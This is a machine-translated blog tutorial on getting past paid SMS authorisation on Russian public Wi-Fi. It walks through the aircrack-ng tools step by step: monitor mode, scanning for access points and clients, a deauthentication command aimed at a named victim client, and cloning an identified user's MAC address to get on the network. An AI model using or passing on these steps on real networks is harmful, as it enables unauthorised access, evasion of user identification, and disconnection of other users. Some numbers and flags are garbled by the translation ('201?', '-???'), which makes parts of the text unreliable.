How to bypass SMS identification when connecting to public Wi-Fi networks?
In 201? RF Government Decree No. 758 No. 80? which obliges owners of public WiFi networks to set up routers, identifies users via passport data, sms or state portal. services. Unwillingness of cafe owners to spend for Captive portal 's contributed to some providers in the distribution of their access points with paid SMS-authorization. I had a desire to check whether such a sms-authorization can be bypassed.
sudo -s # will work with super user rights
ifconfig # look at the name of the adapter that we want to use
We get the conclusion:
wlx60e32719503f: flags = 4099
ether 2a: 36: 62: d5: ec: 63 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
wlx60e32719503f is our
We kill the processes that use the adapter, and we translate it into monitor mode.
airmon-ng check kill
airmon-ng start wlx60e32719503f
We see that there is a new network interface - wlan0mon. Run it
We are waiting for a couple of minutes, and we get such a sign
We are interested in the BSSID fields (access point mac-address), CH (channel) and ESSID (network name). On the field of ESSID I found the network of interest (it is the sixth in the account). We take from the table the mac-address of the access point (CC: B2: **: **: **: FC), the channel (4 channel) on which it works and transfer it to airodump-ng:
airodump-ng wlan0mon -c 4 --bssid CC: B2: **: **: **: FC
We are waiting for some time, and now we get the following conclusion:
In the first table there is only one row. This is our attacked network. In the second table we see the list of clients of this network. We are interested in the STATION field. This is the mac address of the client, save it to a text file. We need to replace our mac-address with one of them. I chose mac the penultimate client (1C: CD: **: **: **: 43), since this client is the most active on the network, and therefore, it certainly passed the identification.
As everyone knows (and I hope you know), it will be difficult for two devices with the same mac-addresses to get along on the same network. And now we have 2 options.
You can use the aireplay-ng utility to deauthenticate our client from the
aireplay-ng -??? -a CC: B2: **: **: **: FC -c 1C: CD: **: **: **: 43 wlan0mon
"-a CC: B2: **: **: **: FC" is the attacked access point
"-c 1C: CD: **: **: **: 43" is the client that we will disable
"-???" - here we specify the type of attack (zero is deauthentication) and the number of deauthentication packages to disconnect the client if it reconnects.
But I decided not to harm a person, but to go in a more humane way - wait until the client himself leaves (it's time to eat pizza).
Fortunately, this client quickly left. Now we have to put his mac-address to himself. There are many ways to change the mac address on linux. The easiest way is to specify the desired mac-address directly in the network settings.
The Mac address is specified, now we can connect to the point, and check the Internet access with the ping command.
Tried to go to Google, and several more sites - successfully.
Thus, we managed to find out that SMS authorization is easily bypassed by replacing your mac-address with the mac-address of the client who has already been identified. In conclusion, I want to say again: "This article was written for informational purposes, the author does not in any way encourage readers to violate the laws of the Russian Federation."
It may be interesting